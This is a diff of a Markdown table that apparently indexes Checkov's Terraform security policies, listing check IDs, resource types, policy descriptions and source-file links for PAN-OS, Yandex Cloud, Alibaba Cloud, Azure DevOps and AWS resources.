Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | -| 2055 | CKV_PAN_11 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | -| 2056 | CKV_PAN_11 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | -| 2057 | CKV_PAN_12 | resource | panos_ipsec_crypto_profile | Ensure IPsec 
profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | -| 2058 | CKV_PAN_12 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | -| 2059 | CKV_PAN_13 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | -| 2060 | CKV_PAN_13 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | -| 2061 | CKV_PAN_14 | resource | panos_panorama_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | -| 2062 | CKV_PAN_14 | resource | panos_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | -| 2063 | CKV_PAN_14 | resource | panos_zone_entry | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | -| 2064 | CKV_PAN_15 | resource | 
panos_panorama_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | -| 2065 | CKV_PAN_15 | resource | panos_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | -| 2066 | CKV_TF_1 | module | module | Ensure Terraform module sources use a commit hash | Terraform | [RevisionHash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionHash.py) | -| 2067 | CKV_YC_1 | resource | yandex_mdb_clickhouse_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2068 | CKV_YC_1 | resource | yandex_mdb_elasticsearch_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2069 | CKV_YC_1 | resource | yandex_mdb_greenplum_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2070 | CKV_YC_1 | resource | yandex_mdb_kafka_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2071 | CKV_YC_1 | resource | yandex_mdb_mongodb_cluster | Ensure security group is assigned to database cluster. 
| Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2072 | CKV_YC_1 | resource | yandex_mdb_mysql_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2073 | CKV_YC_1 | resource | yandex_mdb_postgresql_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2074 | CKV_YC_1 | resource | yandex_mdb_redis_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2075 | CKV_YC_1 | resource | yandex_mdb_sqlserver_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2076 | CKV_YC_2 | resource | yandex_compute_instance | Ensure compute instance does not have public IP. | Terraform | [ComputeVMPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMPublicIP.py) | -| 2077 | CKV_YC_3 | resource | yandex_storage_bucket | Ensure storage bucket is encrypted. | Terraform | [ObjectStorageBucketEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketEncryption.py) | -| 2078 | CKV_YC_4 | resource | yandex_compute_instance | Ensure compute instance does not have serial console enabled. 
| Terraform | [ComputeVMSerialConsole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSerialConsole.py) | -| 2079 | CKV_YC_5 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster does not have public IP address. | Terraform | [K8SPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SPublicIP.py) | -| 2080 | CKV_YC_6 | resource | yandex_kubernetes_node_group | Ensure Kubernetes cluster node group does not have public IP addresses. | Terraform | [K8SNodeGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupPublicIP.py) | -| 2081 | CKV_YC_7 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster auto-upgrade is enabled. | Terraform | [K8SAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SAutoUpgrade.py) | -| 2082 | CKV_YC_8 | resource | yandex_kubernetes_node_group | Ensure Kubernetes node group auto-upgrade is enabled. | Terraform | [K8SNodeGroupAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupAutoUpgrade.py) | -| 2083 | CKV_YC_9 | resource | yandex_kms_symmetric_key | Ensure KMS symmetric key is rotated. | Terraform | [KMSSymmetricKeyRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/KMSSymmetricKeyRotation.py) | -| 2084 | CKV_YC_10 | resource | yandex_kubernetes_cluster | Ensure etcd database is encrypted with KMS key. | Terraform | [K8SEtcdKMSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SEtcdKMSEncryption.py) | -| 2085 | CKV_YC_11 | resource | yandex_compute_instance | Ensure security group is assigned to network interface. 
| Terraform | [ComputeVMSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSecurityGroup.py) | -| 2086 | CKV_YC_12 | resource | yandex_mdb_clickhouse_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2087 | CKV_YC_12 | resource | yandex_mdb_elasticsearch_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2088 | CKV_YC_12 | resource | yandex_mdb_greenplum_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2089 | CKV_YC_12 | resource | yandex_mdb_kafka_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2090 | CKV_YC_12 | resource | yandex_mdb_mongodb_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2091 | CKV_YC_12 | resource | yandex_mdb_mysql_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2092 | CKV_YC_12 | resource | yandex_mdb_postgresql_cluster | Ensure public IP is not assigned to database cluster. 
| Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2093 | CKV_YC_12 | resource | yandex_mdb_sqlserver_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 2094 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure cloud member does not have elevated access. | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | -| 2095 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_member | Ensure cloud member does not have elevated access. | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | -| 2096 | CKV_YC_14 | resource | yandex_kubernetes_cluster | Ensure security group is assigned to Kubernetes cluster. | Terraform | [K8SSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SSecurityGroup.py) | -| 2097 | CKV_YC_15 | resource | yandex_kubernetes_node_group | Ensure security group is assigned to Kubernetes node group. | Terraform | [K8SNodeGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupSecurityGroup.py) | -| 2098 | CKV_YC_16 | resource | yandex_kubernetes_cluster | Ensure network policy is assigned to Kubernetes cluster. | Terraform | [K8SNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNetworkPolicy.py) | -| 2099 | CKV_YC_17 | resource | yandex_storage_bucket | Ensure storage bucket does not have public access permissions. 
| Terraform | [ObjectStorageBucketPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketPublicAccess.py) | -| 2100 | CKV_YC_18 | resource | yandex_compute_instance_group | Ensure compute instance group does not have public IP. | Terraform | [ComputeInstanceGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupPublicIP.py) | -| 2101 | CKV_YC_19 | resource | yandex_vpc_security_group | Ensure security group does not contain allow-all rules. | Terraform | [VPCSecurityGroupAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupAllowAll.py) | -| 2102 | CKV_YC_20 | resource | yandex_vpc_security_group_rule | Ensure security group rule is not allow-all. | Terraform | [VPCSecurityGroupRuleAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupRuleAllowAll.py) | -| 2103 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_binding | Ensure organization member does not have elevated access. | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | -| 2104 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_member | Ensure organization member does not have elevated access. | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | -| 2105 | CKV_YC_22 | resource | yandex_compute_instance_group | Ensure compute instance group has security group assigned. 
| Terraform | [ComputeInstanceGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupSecurityGroup.py) | -| 2106 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_binding | Ensure folder member does not have elevated access. | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | -| 2107 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_member | Ensure folder member does not have elevated access. | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | -| 2108 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 2109 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 2110 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. 
| Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 2111 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 2112 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 2113 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. 
| Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| | Id | Type | Entity | Policy | IaC | Resource Link | +|------|-----------------|----------|---------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-----------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| 0 | CKV2_ADO_1 | resource | azuredevops_branch_policy_min_reviewers | Ensure at least two approving reviews for PRs | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | +| 1 | CKV2_ADO_1 | resource | azuredevops_git_repository | Ensure at least two approving reviews for PRs | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | +| 2 | CKV_ALI_1 | resource | alicloud_oss_bucket | Alibaba Cloud OSS bucket accessible to public | Terraform | [OSSBucketPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketPublic.py) | +| 3 | CKV_ALI_2 | resource | alicloud_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress22.py) | +| 4 | CKV_ALI_3 | resource | alicloud_security_group_rule | 
Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress3389.py) | +| 5 | CKV_ALI_4 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all regions | Terraform | [ActionTrailLogAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllRegions.py) | +| 6 | CKV_ALI_5 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all events | Terraform | [ActionTrailLogAllEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllEvents.py) | +| 7 | CKV_ALI_6 | resource | alicloud_oss_bucket | Ensure OSS bucket is encrypted with Customer Master Key | Terraform | [OSSBucketEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketEncryptedWithCMK.py) | +| 8 | CKV_ALI_7 | resource | alicloud_disk | Ensure disk is encrypted | Terraform | [DiskIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskIsEncrypted.py) | +| 9 | CKV_ALI_8 | resource | alicloud_disk | Ensure Disk is encrypted with Customer Master Key | Terraform | [DiskEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskEncryptedWithCMK.py) | +| 10 | CKV_ALI_9 | resource | alicloud_db_instance | Ensure database instance is not public | Terraform | [RDSIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSIsPublic.py) | +| 11 | CKV_ALI_10 | resource | alicloud_oss_bucket | Ensure OSS bucket has versioning enabled | Terraform | 
[OSSBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketVersioning.py) |
+| 12 | CKV_ALI_11 | resource | alicloud_oss_bucket | Ensure OSS bucket has transfer Acceleration enabled | Terraform | [OSSBucketTransferAcceleration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketTransferAcceleration.py) |
+| 13 | CKV_ALI_12 | resource | alicloud_oss_bucket | Ensure the OSS bucket has access logging enabled | Terraform | [OSSBucketAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketAccessLogs.py) |
+| 14 | CKV_ALI_13 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires minimum length of 14 or greater | Terraform | [RAMPasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLength.py) |
+| 15 | CKV_ALI_14 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one number | Terraform | [RAMPasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyNumber.py) |
+| 16 | CKV_ALI_15 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one symbol | Terraform | [RAMPasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicySymbol.py) |
+| 17 | CKV_ALI_16 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy expires passwords within 90 days or less | Terraform | [RAMPasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyExpiration.py) |
+| 18 | CKV_ALI_17 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires 
at least one lowercase letter | Terraform | [RAMPasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLowercaseLetter.py) |
+| 19 | CKV_ALI_18 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy prevents password reuse | Terraform | [RAMPasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyReuse.py) |
+| 20 | CKV_ALI_19 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one uppercase letter | Terraform | [RAMPasswordPolicyUppcaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyUppcaseLetter.py) |
+| 21 | CKV_ALI_20 | resource | alicloud_db_instance | Ensure RDS instance uses SSL | Terraform | [RDSInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceSSL.py) |
+| 22 | CKV_ALI_21 | resource | alicloud_api_gateway_api | Ensure API Gateway API Protocol HTTPS | Terraform | [APIGatewayProtocolHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/APIGatewayProtocolHTTPS.py) |
+| 23 | CKV_ALI_22 | resource | alicloud_db_instance | Ensure Transparent Data Encryption is Enabled on instance | Terraform | [RDSTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSTransparentDataEncryptionEnabled.py) |
+| 24 | CKV_ALI_23 | resource | alicloud_ram_account_password_policy | Ensure Ram Account Password Policy Max Login Attempts not > 5 | Terraform | [RAMPasswordPolicyMaxLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyMaxLogin.py) |
+| 25 | CKV_ALI_24 | resource | alicloud_ram_security_preference | Ensure RAM 
enforces MFA | Terraform | [RAMSecurityEnforceMFA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMSecurityEnforceMFA.py) |
+| 26 | CKV_ALI_25 | resource | alicloud_db_instance | Ensure RDS Instance SQL Collector Retention Period should be greater than 180 | Terraform | [RDSRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSRetention.py) |
+| 27 | CKV_ALI_26 | resource | alicloud_cs_kubernetes | Ensure Kubernetes installs plugin Terway or Flannel to support standard policies | Terraform | [K8sEnableNetworkPolicies.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sEnableNetworkPolicies.py) |
+| 28 | CKV_ALI_27 | resource | alicloud_kms_key | Ensure KMS Key Rotation is enabled | Terraform | [KMSKeyRotationIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyRotationIsEnabled.py) |
+| 29 | CKV_ALI_28 | resource | alicloud_kms_key | Ensure KMS Keys are enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyIsEnabled.py) |
+| 30 | CKV_ALI_29 | resource | alicloud_alb_acl_entry_attachment | Alibaba ALB ACL does not restrict Access | Terraform | [ALBACLIsUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ALBACLIsUnrestricted.py) |
+| 31 | CKV_ALI_30 | resource | alicloud_db_instance | Ensure RDS instance auto upgrades for minor versions | Terraform | [RDSInstanceAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceAutoUpgrade.py) |
+| 32 | CKV_ALI_31 | resource | alicloud_cs_kubernetes_node_pool | Ensure K8s nodepools are set to auto repair | Terraform | 
[K8sNodePoolAutoRepair.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sNodePoolAutoRepair.py) |
+| 33 | CKV_ALI_32 | resource | alicloud_ecs_launch_template | Ensure launch template data disks are encrypted | Terraform | [LaunchTemplateDisksAreEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LaunchTemplateDisksAreEncrypted.py) |
+| 34 | CKV_ALI_33 | resource | alicloud_slb_tls_cipher_policy | Alibaba Cloud Cypher Policy are secure | Terraform | [TLSPoliciesAreSecure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/TLSPoliciesAreSecure.py) |
+| 35 | CKV_ALI_35 | resource | alicloud_db_instance | Ensure RDS instance has log_duration enabled | Terraform | [RDSInstanceLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogsEnabled.py) |
+| 36 | CKV_ALI_36 | resource | alicloud_db_instance | Ensure RDS instance has log_disconnections enabled | Terraform | [RDSInstanceLogDisconnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogDisconnections.py) |
+| 37 | CKV_ALI_37 | resource | alicloud_db_instance | Ensure RDS instance has log_connections enabled | Terraform | [RDSInstanceLogConnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogConnections.py) |
+| 38 | CKV_ALI_38 | resource | alicloud_log_audit | Ensure log audit is enabled for RDS | Terraform | [LogAuditRDSEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LogAuditRDSEnabled.py) |
+| 39 | CKV_ALI_41 | resource | alicloud_mongodb_instance | Ensure MongoDB is deployed inside a VPC | Terraform | 
[MongoDBInsideVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInsideVPC.py) |
+| 40 | CKV_ALI_42 | resource | alicloud_mongodb_instance | Ensure Mongodb instance uses SSL | Terraform | [MongoDBInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInstanceSSL.py) |
+| 41 | CKV_ALI_43 | resource | alicloud_mongodb_instance | Ensure MongoDB instance is not public | Terraform | [MongoDBIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBIsPublic.py) |
+| 42 | CKV_ALI_44 | resource | alicloud_mongodb_instance | Ensure MongoDB has Transparent Data Encryption Enabled | Terraform | [MongoDBTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBTransparentDataEncryptionEnabled.py) |
+| 43 | CKV_AWS_1 | data | aws_iam_policy_document | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/AdminPolicyDocument.py) |
+| 44 | CKV_AWS_2 | resource | aws_alb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) |
+| 45 | CKV_AWS_2 | resource | aws_lb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) |
+| 46 | CKV_AWS_3 | resource | aws_ebs_volume | Ensure all data stored in the EBS is securely encrypted | Terraform | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSEncryption.py) |
+| 47 | CKV_AWS_5 | resource | aws_elasticsearch_domain | Ensure all 
data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) |
+| 48 | CKV_AWS_5 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) |
